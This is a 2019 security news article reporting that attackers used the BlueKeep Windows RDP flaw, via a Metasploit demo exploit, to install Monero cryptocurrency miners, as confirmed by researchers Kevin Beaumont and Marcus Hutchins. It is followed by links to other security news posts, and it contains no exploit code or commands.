Show vulnerabilities with patch / with exploit
5 November 2019

Hackers using BlueKeep remote desktop security flaw to install cruptocurrency miners on vulnerable PCs


Hackers using BlueKeep remote desktop security flaw to install cruptocurrency miners on vulnerable PCs

Security researchers have detected the first mass-hacking campaign using the BlueKeep flaw in Windows operating system to infect computers with a cryptocurrency miner. The good news is that the exploit is not being leveraged as a self-propagading worm, as Microsoft has cautioned back in May when it issued a patch urging users to update their systems, but rather attacks appear to be an opportunistic endeavor in pursuit of monetary gain.

detected a spike in attacks exploiting the BlueKeep vulnerability, but rather than taking remote control of the machines, the attackers were causing them to crush. According to Beaumont, the attacks began on October 23.

Beaumont’s discovery was confirmed by security expert Marcus "MalwareTech" Hutchins. According to researcher’s blog post, the attackers were using a demo BlueKeep exploit released by Metasploit team back in September to compromise Windows systems and install a Monero cryptocurrency miner.

"Finally, we confirm this segment [in crash dump] points to executable shellcode. At this point, we can assert valid BlueKeep exploit attempts in the wild, with shellcode that even matches that of the shellcode in the BlueKeep Metasploit module!" Hutchins said.

The analyzed exploit contained encoded PowerShell commands as the initial payload, which downloaded the final malicious executable binary from a remote attacker-controlled server and executed it on the targeted systems.

Hutchins also confirmed that this hacking operation doesn’t include self-spreading, worm-like capabilities, instead, it appears that the attackers are scanning the internet in search of vulnerable Windows with exposed RDP ports, deploy the BlueKeep exploit and then install a cryptocurrency miner.


Back to the list

Latest Posts

Weekly security roundup: May 25

Weekly security roundup: May 25

A massive cyber attack against Israeli websites,the EasyJet's data breach, the arrest of a hacker known as Sanix, responsible for selling billions of hacked user credentials, and more.
25 May 2020
A huge Thai database leaked 8.3 billion internet records

A huge Thai database leaked 8.3 billion internet records

According to the researcher, anyone having access to this data can “paint a picture of what a person does on the Internet.”
25 May 2020
Air transport and government agencies in Kuwait and Saudi Arabia targeted by Iranian-linked Chafer APT

Air transport and government agencies in Kuwait and Saudi Arabia targeted by Iranian-linked Chafer APT

The attacks appear more focused and sophisticated on victims from Kuwait.
25 May 2020